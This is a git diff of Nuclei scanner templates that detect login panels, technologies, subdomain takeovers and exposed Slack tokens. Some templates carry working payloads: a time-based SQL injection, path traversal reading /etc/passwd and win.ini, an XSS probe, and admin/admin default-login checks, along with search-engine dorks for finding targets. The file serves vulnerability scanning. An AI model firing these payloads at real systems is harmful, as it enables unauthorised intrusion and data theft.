a/nuclei-templates/Other/sitemap-detect.yaml b/nuclei-templates/Other/sitemap-detect.yaml deleted file mode 100644 index 0061745d93..0000000000 --- a/nuclei-templates/Other/sitemap-detect.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: sitemap-detect - -info: - name: Sitemap Detection - author: houdinis - severity: info - description: | - A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. - metadata: - verified: "true" - google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd - tags: misc,generic,sitemap - -requests: - - method: GET - path: - - "{{BaseURL}}/sitemap.xml" - - "{{BaseURL}}/sitemap.xsl" - - "{{BaseURL}}/sitemap.xsd" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "sitemap>" - case-insensitive: true - - - type: word - part: header - words: - - 'application/xml' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/sitemap-sql-injection.yaml b/nuclei-templates/Other/sitemap-sql-injection.yaml deleted file mode 100644 index 0f4c0a6627..0000000000 --- a/nuclei-templates/Other/sitemap-sql-injection.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: sitemap-sql-injection -info: - name: SQL injection in /sitemap.xml and offset parameter - severity: high - author: Red_darkin - tags: - - sql-injection - - sitemap.xml - - offset-parameter - -requests: - - method: GET - - path: - - "{{BaseURL}}/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#" - - "{{BaseURL}}/sitemap.xml?offset=1%3BSELECT%20IF%28%288303%3E8302%29%2CSLEEP%285%29%2C2356%29%23" - - matchers: - - type: dsl - dsl: - - 'duration>=8' diff --git a/nuclei-templates/Other/sitemap.yaml b/nuclei-templates/Other/sitemap.yaml new file mode 100644 index 0000000000..28a441a26e --- /dev/null +++ b/nuclei-templates/Other/sitemap.yaml @@ -0,0 +1,39 @@ +id: sitemap-detect + +info: + name: Sitemap Detection + author: houdinis + severity: info + description: | + A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. + metadata: + verified: true + max-request: 3 + google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd + tags: miscellaneous,misc,generic,sitemap + +http: + - method: GET + path: + - "{{BaseURL}}/sitemap.xml" + - "{{BaseURL}}/sitemap.xsl" + - "{{BaseURL}}/sitemap.xsd" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + words: + - "sitemap>" + case-insensitive: true + + - type: word + part: header + words: + - 'application/xml' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100a3886dc74b36d5afa342e5daacaafa7c5d23111e4b867609a22228c4893916b5022100a5406e5dbb7748c7df6eb13b48988cd0c6adfbed1834b68c6257e32754cc1a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/siteomat-login-10301.yaml b/nuclei-templates/Other/siteomat-login-10301.yaml deleted file mode 100644 index e24172c9a5..0000000000 --- a/nuclei-templates/Other/siteomat-login-10301.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: siteomat-loader -info: - name: Orpak SiteOmat login portals - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6624 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login.htm' - matchers-condition: and - matchers: - - type: word - words: - - 'SiteOmat Login' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/siteomat-login.yaml b/nuclei-templates/Other/siteomat-login.yaml new file mode 100644 index 0000000000..20854f2b8d --- /dev/null +++ b/nuclei-templates/Other/siteomat-login.yaml @@ -0,0 +1,19 @@ +id: siteomat-loader +info: + name: Orpak SiteOmat login portals + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6624 + tags: panel,siteomat,login +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + matchers-condition: and + matchers: + - type: word + words: + - 'SiteOmat Login' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/skt-blocks.yaml b/nuclei-templates/Other/skt-blocks.yaml new file mode 100644 index 0000000000..21b575dea4 --- /dev/null +++ b/nuclei-templates/Other/skt-blocks.yaml @@ -0,0 +1,59 @@ +id: skt-blocks + +info: + name: > + SKT Blocks – Gutenberg based Page Builder <= 1.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8a2cd4d3-12d3-43bd-bde1-927b793f04a8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/skt-blocks/" + google-query: inurl:"/wp-content/plugins/skt-blocks/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,skt-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/skt-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "skt-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/nuclei-templates/Other/skycaiji-admin-panel-10306.yaml b/nuclei-templates/Other/skycaiji-admin-panel-10306.yaml deleted file mode 100644 index 302f6cef6f..0000000000 --- a/nuclei-templates/Other/skycaiji-admin-panel-10306.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: skycaiji-admin-panel - -info: - name: SkyCaiji Admin Panel - author: princechaddha - severity: info - tags: panel,tech,skycaiji - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?s=/admin/Index/index" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - '

    Powered by ' - - '' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'com">SkyCaiji<\/a> ([A-Z0-9.]+) 后台管理<\/p>' diff --git a/nuclei-templates/Other/skycaiji-admin-panel.yaml b/nuclei-templates/Other/skycaiji-admin-panel.yaml new file mode 100644 index 0000000000..8a3839310e --- /dev/null +++ b/nuclei-templates/Other/skycaiji-admin-panel.yaml @@ -0,0 +1,27 @@ +id: skycaiji-admin-panel +info: + name: SkyCaiji Admin Panel + author: princechaddha + severity: info + tags: panel,tech +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?s=/admin/Index/index" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '

    Powered by ' + - '' + condition: and + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - 'com">SkyCaiji<\/a> ([A-Z0-9.]+) 后台管理<\/p>' diff --git a/nuclei-templates/Other/skycaiji-install-10309.yaml b/nuclei-templates/Other/skycaiji-install-10309.yaml index b88e58204b..4edf4869d7 100644 --- a/nuclei-templates/Other/skycaiji-install-10309.yaml +++ b/nuclei-templates/Other/skycaiji-install-10309.yaml @@ -1,14 +1,16 @@ id: skycaiji-install + info: - name: SkyCaiji - Exposed Installation + name: SkyCaiji Exposed Installation author: pikpikcu severity: high - description: SkyCaiji was discovered. tags: tech,skycaiji,exposure,misconfig + requests: - method: GET path: - '{{BaseURL}}/index.php?s=/install/index/index' + matchers-condition: and matchers: - type: word @@ -18,8 +20,7 @@ requests: - 'https://www.skycaiji.com' - '' condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/07/21 diff --git a/nuclei-templates/Other/sl-studio-lfi-10320.yaml b/nuclei-templates/Other/sl-studio-lfi-10320.yaml new file mode 100644 index 0000000000..9679b24436 --- /dev/null +++ b/nuclei-templates/Other/sl-studio-lfi-10320.yaml @@ -0,0 +1,22 @@ +id: sl-studio-lfi +info: + name: Webbdesign SL-Studio Directory Traversal + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018110187 + metadata: + google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.' + tags: slstudio,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/sl-studio-lfi.yaml b/nuclei-templates/Other/sl-studio-lfi.yaml deleted file mode 100644 index 90dd6e278e..0000000000 --- a/nuclei-templates/Other/sl-studio-lfi.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: sl-studio-lfi -info: - name: Webbdesign SL-Studio - Local File Inclusion - author: 0x_Akoko - severity: high - description: Webbdesign SL-Studio is vulnerable to local file inclusion. - reference: - - https://cxsecurity.com/issue/WLB-2018110187 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.' - tags: slstudio,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/nuclei-templates/Other/slack-api(1).yaml b/nuclei-templates/Other/slack-api(1).yaml index 51bef1c14c..ea761c24d4 100644 --- a/nuclei-templates/Other/slack-api(1).yaml +++ b/nuclei-templates/Other/slack-api(1).yaml @@ -1,12 +1,15 @@ id: slack-api + info: name: Slack API Key author: gaurang severity: high tags: token,file,slack + file: - extensions: - all + extractors: - type: regex regex: diff --git a/nuclei-templates/Other/slack-bot-token-10310.yaml b/nuclei-templates/Other/slack-bot-token-10310.yaml deleted file mode 100644 index e520d806c8..0000000000 --- a/nuclei-templates/Other/slack-bot-token-10310.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: slack-bot-token - -info: - name: Slack access token - author: nadino - severity: info - tags: exposure,token,slack - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - part: body - regex: - - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file diff --git a/nuclei-templates/Other/slack-bot-token-10312.yaml b/nuclei-templates/Other/slack-bot-token-10312.yaml new file mode 100644 index 0000000000..8e76c2814d --- /dev/null +++ b/nuclei-templates/Other/slack-bot-token-10312.yaml @@ -0,0 +1,15 @@ +id: slack-bot-token +info: + name: Slack access token + author: nadino + severity: info + tags: exposure,token,slack +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - "xoxb-[0-9A-Za-z\\-]{51}" diff --git a/nuclei-templates/Other/slack-webhook(1).yaml b/nuclei-templates/Other/slack-webhook(1).yaml deleted file mode 100644 index 97548ae165..0000000000 --- a/nuclei-templates/Other/slack-webhook(1).yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: slack-webhook - -info: - name: Slack Webhook - author: gaurang - severity: high - tags: token,file,slack - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" diff --git a/nuclei-templates/Other/slocum-login-10316.yaml b/nuclei-templates/Other/slocum-login.yaml similarity index 100% rename from nuclei-templates/Other/slocum-login-10316.yaml rename to nuclei-templates/Other/slocum-login.yaml diff --git a/nuclei-templates/Other/smartjob-takeover-10324.yaml b/nuclei-templates/Other/smartjob-takeover-10324.yaml deleted file mode 100644 index 51da5566a4..0000000000 --- a/nuclei-templates/Other/smartjob-takeover-10324.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: smartjob-takeover -info: - name: smartjob takeover detection - author: pdteam - severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Job Board Is Unavailable - - This job board website is either expired - - This job board website is either expired or its domain name is invalid. diff --git a/nuclei-templates/Other/smartjob-takeover.yaml b/nuclei-templates/Other/smartjob-takeover.yaml new file mode 100644 index 0000000000..66bc266bc8 --- /dev/null +++ b/nuclei-templates/Other/smartjob-takeover.yaml @@ -0,0 +1,17 @@ +id: smartjob-takeover +info: + name: smartjob takeover detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - Job Board Is Unavailable + - This job board website is either expired + - This job board website is either expired or its domain name is invalid. diff --git a/nuclei-templates/Other/smartling-takeover-10326.yaml b/nuclei-templates/Other/smartling-takeover-10326.yaml new file mode 100644 index 0000000000..b956b52d44 --- /dev/null +++ b/nuclei-templates/Other/smartling-takeover-10326.yaml @@ -0,0 +1,15 @@ +id: smartling-takeover +info: + name: smartling takeover detection + author: pdcommunity + severity: info + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/67 +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - Domain is not configured diff --git a/nuclei-templates/Other/smartling-takeover-10327.yaml b/nuclei-templates/Other/smartling-takeover-10327.yaml deleted file mode 100644 index 00905c7342..0000000000 --- a/nuclei-templates/Other/smartling-takeover-10327.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: smartling-takeover -info: - name: smartling takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/67 -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Domain is not configured diff --git a/nuclei-templates/Other/smartsense-default-login-10328.yaml b/nuclei-templates/Other/smartsense-default-login-10328.yaml deleted file mode 100644 index b4af83b266..0000000000 --- a/nuclei-templates/Other/smartsense-default-login-10328.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: smartsense-default-login -info: - name: HortonWorks SmartSense Default Login - author: Techryptic (@Tech) - severity: high - description: HortonWorks SmartSense default admin login information was detected. - reference: - - https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: hortonworks,smartsense,default-login -requests: - - raw: - - | - GET /apt/v1/context HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - "Set-Cookie: SUPPORTSESSIONID" - part: header - - type: word - words: - - "smartsenseId" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/nuclei-templates/Other/smartsense-default-login-10331.yaml b/nuclei-templates/Other/smartsense-default-login-10331.yaml new file mode 100644 index 0000000000..0bddf7fce8 --- /dev/null +++ b/nuclei-templates/Other/smartsense-default-login-10331.yaml @@ -0,0 +1,38 @@ +id: smartsense-default-login + +info: + name: HortonWorks SmartSense Default Login + author: Techryptic (@Tech) + severity: high + description: Default Login of admin:admin on HortonWorks SmartSense application. + reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html + tags: hortonworks,smartsense,default-login + +requests: + - raw: + - | + GET /apt/v1/context HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: SUPPORTSESSIONID" + part: header + + - type: word + words: + - "smartsenseId" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/smartstore-detect-10332.yaml b/nuclei-templates/Other/smartstore-detect-10332.yaml new file mode 100644 index 0000000000..3fbff40d7a --- /dev/null +++ b/nuclei-templates/Other/smartstore-detect-10332.yaml @@ -0,0 +1,37 @@ +id: smartstore-detect + +info: + name: SmartStore Detect + author: princechaddha + severity: info + reference: + - https://github.com/smartstore/SmartStoreNET + metadata: + max-request: 1 + shodan-query: http.html:'content="Smartstore' + tags: tech,smartstore,oss + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '' + +# digest: 4a0a00473045022018a8bf80686d606487628b98a556864708b3e41d09ac2125c7b49dd65a7ce794022100f9709ab85ec5ebe2358b9f3bb10818003a36e06d2e1efcc8639d6f6b1c15df0d:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/smartstore-detect-10334.yaml b/nuclei-templates/Other/smartstore-detect-10334.yaml deleted file mode 100644 index d3aa558182..0000000000 --- a/nuclei-templates/Other/smartstore-detect-10334.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: smartstore-detect -info: - name: SmartStore Detect - author: princechaddha - severity: info - reference: https://github.com/smartstore/SmartStoreNET - metadata: - shodan-query: http.html:'content="Smartstore' - tags: tech,smartstore,oss -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - '' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '' diff --git a/nuclei-templates/Other/smb-v1-detection.yaml b/nuclei-templates/Other/smb-v1-detection.yaml index 4ff32b9e36..8326a7cd28 100644 --- a/nuclei-templates/Other/smb-v1-detection.yaml +++ b/nuclei-templates/Other/smb-v1-detection.yaml @@ -3,8 +3,9 @@ info: name: SMB-V1 Detection author: pussycat0x severity: low + reference: + - https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/ tags: network,windows,smb,service - reference: https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/ network: - inputs: - data: 00000031ff534d4272000000001845680000000000000000000000000000be2200000100000e00024e54204c4d20302e3132000200 diff --git a/nuclei-templates/Other/smugmug-takeover-10339.yaml b/nuclei-templates/Other/smugmug-takeover-10339.yaml new file mode 100644 index 0000000000..2ff73bff7a --- /dev/null +++ b/nuclei-templates/Other/smugmug-takeover-10339.yaml @@ -0,0 +1,16 @@ +id: smugmug-takeover +info: + name: smugmug takeover detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - '{"text":"Page Not Found"' diff --git a/nuclei-templates/Other/smugmug-takeover-10340.yaml b/nuclei-templates/Other/smugmug-takeover-10340.yaml deleted file mode 100644 index 9678ab5c80..0000000000 --- a/nuclei-templates/Other/smugmug-takeover-10340.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: smugmug-takeover -info: - name: smugmug takeover detection - author: pdcommunity - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - '{"text":"Page Not Found"' diff --git a/nuclei-templates/Other/sniplets-lfi.yaml b/nuclei-templates/Other/sniplets-lfi-10342.yaml similarity index 100% rename from nuclei-templates/Other/sniplets-lfi.yaml rename to nuclei-templates/Other/sniplets-lfi-10342.yaml diff --git a/nuclei-templates/Other/sniplets-xss-10345.yaml b/nuclei-templates/Other/sniplets-xss-10345.yaml new file mode 100644 index 0000000000..42c48bf14f --- /dev/null +++ b/nuclei-templates/Other/sniplets-xss-10345.yaml @@ -0,0 +1,30 @@ +id: sniplets-xss + +info: + name: Wordpress Plugin Sniplets - XSS + author: dhiyaneshDK + severity: medium + description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets + reference: https://www.exploit-db.com/exploits/5194 + tags: xss,wordpress,wp-plugin,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/sniplets-xss.yaml b/nuclei-templates/Other/sniplets-xss.yaml deleted file mode 100644 index c48716aeb9..0000000000 --- a/nuclei-templates/Other/sniplets-xss.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: sniplets-xss -info: - name: Wordpress Plugin Sniplets - XSS - author: dhiyaneshDK - severity: medium - description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets - reference: https://www.exploit-db.com/exploits/5194 - tags: xss,wordpress,wp-plugin,wp -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/snyk-ignore-file-disclosure-10347.yaml b/nuclei-templates/Other/snyk-ignore-file-disclosure.yaml similarity index 100% rename from nuclei-templates/Other/snyk-ignore-file-disclosure-10347.yaml rename to nuclei-templates/Other/snyk-ignore-file-disclosure.yaml diff --git a/nuclei-templates/Other/sofneta-mecdream-pacs-lfi-10351.yaml b/nuclei-templates/Other/sofneta-mecdream-pacs-lfi-10351.yaml new file mode 100644 index 0000000000..4e865626ce --- /dev/null +++ b/nuclei-templates/Other/sofneta-mecdream-pacs-lfi-10351.yaml @@ -0,0 +1,30 @@ +id: sofneta-mecdream-pacs-lfi +info: + name: Softneta MedDream PACS Server Premium 6.7.1.1 - Local File Inclusion + author: 0x_akoko + severity: high + description: Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to local file inclusion. + reference: + - https://www.exploit-db.com/exploits/45347 + - https://www.softneta.com/products/meddream-pacs-server/downloads.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login + tags: sofneta,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini" + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + +# Enhanced by mp on 2022/08/04 diff --git a/nuclei-templates/Other/sofneta-mecdream-pacs-lfi.yaml b/nuclei-templates/Other/sofneta-mecdream-pacs-lfi.yaml deleted file mode 100644 index b74037e94f..0000000000 --- a/nuclei-templates/Other/sofneta-mecdream-pacs-lfi.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: sofneta-mecdream-pacs-lfi -info: - name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal - author: 0x_akoko - severity: high - description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal - reference: - - https://www.exploit-db.com/exploits/45347 - - https://www.softneta.com/products/meddream-pacs-server/downloads.html - metadata: - google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login - tags: sofneta,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini" - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and diff --git a/nuclei-templates/Other/solarwinds-default-admin.yaml b/nuclei-templates/Other/solarwinds-default-admin.yaml new file mode 100644 index 0000000000..421104562e --- /dev/null +++ b/nuclei-templates/Other/solarwinds-default-admin.yaml @@ -0,0 +1,45 @@ +id: solarwinds-default-admin + +info: + name: SolarWinds Orion Default Login + author: dwisiswant0 + severity: high + tags: solarwinds,default-login + reference: https://github.com/solarwinds/OrionSDK/wiki/REST + + # Optional: + # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 + # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} + +requests: + - raw: + - | + GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username)}} + + - | + GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username)}} + + payloads: + username: + - admin + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + words: + - "Content-Type: application/json" + part: header + - type: regex + regex: + - "(totalRow|result|swi)s(:\\/\\/)?" + - "(Orion\\.|Poller(ID)?)s?" + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/solarwinds-default-login-10355.yaml b/nuclei-templates/Other/solarwinds-default-login-10355.yaml deleted file mode 100644 index 64d31401a7..0000000000 --- a/nuclei-templates/Other/solarwinds-default-login-10355.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: solarwinds-default-admin - -info: - name: SolarWinds Orion Default Credentials - author: dwisiswant0 - severity: high - tags: solarwinds,default-login - - # Optional: - # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 - # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} - - # References: - # - https://github.com/solarwinds/OrionSDK/wiki/REST - -requests: - - method: GET - path: - - "{{BaseURL}}/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" # First path is default base path - - "{{BaseURL}}/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" - headers: - Authorization: "Basic YWRtaW46" - matchers-condition: and - matchers: - - type: word - words: - - "Content-Type: application/json" - part: header - - type: regex - regex: - - "(totalRow|result|swi)s(:\\/\\/)?" - - "(Orion\\.|Poller(ID)?)s?" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/solarwinds-orion-10357.yaml b/nuclei-templates/Other/solarwinds-orion-10357.yaml deleted file mode 100644 index a07f003f46..0000000000 --- a/nuclei-templates/Other/solarwinds-orion-10357.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: solarwinds-orion -info: - name: SolarWinds Orion Panel - author: puzzlepeaches - severity: info - tags: panel,solarwinds -requests: - - method: GET - path: - - "{{BaseURL}}/Orion/Login.aspx" - matchers: - - type: word - words: - - "SolarWinds Orion" - part: body diff --git a/nuclei-templates/Other/solarwinds-orion-10359.yaml b/nuclei-templates/Other/solarwinds-orion-10359.yaml new file mode 100644 index 0000000000..ed83c87d2b --- /dev/null +++ b/nuclei-templates/Other/solarwinds-orion-10359.yaml @@ -0,0 +1,17 @@ +id: solarwinds-orion +info: + name: SolarWinds Orion Panel + author: puzzlepeaches + severity: info + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/Orion/Login.aspx" + headers: + User-Agent: "Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0" + matchers: + - type: word + words: + - "SolarWinds Orion" + part: body diff --git a/nuclei-templates/Other/solr-exposure-10364.yaml b/nuclei-templates/Other/solr-exposure.yaml similarity index 100% rename from nuclei-templates/Other/solr-exposure-10364.yaml rename to nuclei-templates/Other/solr-exposure.yaml diff --git a/nuclei-templates/Other/solr-fileRead.yaml b/nuclei-templates/Other/solr-fileread.yaml similarity index 100% rename from nuclei-templates/Other/solr-fileRead.yaml rename to nuclei-templates/Other/solr-fileread.yaml diff --git a/nuclei-templates/Other/solr-query-dashboard-10369.yaml b/nuclei-templates/Other/solr-query-dashboard-10369.yaml deleted file mode 100644 index f36e4e3316..0000000000 --- a/nuclei-templates/Other/solr-query-dashboard-10369.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: solr-admin-query - -info: - name: Solr Admin Query Page - author: dhiyaneshDK - severity: high - reference: - - https://www.exploit-db.com/ghdb/5856 - tags: solr,unauth - -requests: - - method: GET - path: - - '{{BaseURL}}/admin/' - - '{{BaseURL}}/solr/admin/' - - matchers-condition: and - matchers: - - type: word - words: - - 'Solr admin page' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/solr-query-dashboard-10370.yaml b/nuclei-templates/Other/solr-query-dashboard-10370.yaml new file mode 100644 index 0000000000..c291114a6f --- /dev/null +++ b/nuclei-templates/Other/solr-query-dashboard-10370.yaml @@ -0,0 +1,24 @@ +id: solr-admin-query + +info: + name: Solr Admin Query Page + author: dhiyaneshDK + severity: high + reference: https://www.exploit-db.com/ghdb/5856 + tags: solr,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/' + - '{{BaseURL}}/solr/admin/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Solr admin page' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/somfy-login-10371.yaml b/nuclei-templates/Other/somfy-login-10371.yaml new file mode 100644 index 0000000000..4a22eded46 --- /dev/null +++ b/nuclei-templates/Other/somfy-login-10371.yaml @@ -0,0 +1,18 @@ +id: somfy-login +info: + name: Somfy Login Page + author: DhiyaneshDK + severity: info + tags: panel,login +requests: + - method: GET + path: + - '{{BaseURL}}/m_login.htm' + matchers-condition: and + matchers: + - type: word + words: + - Home motion by 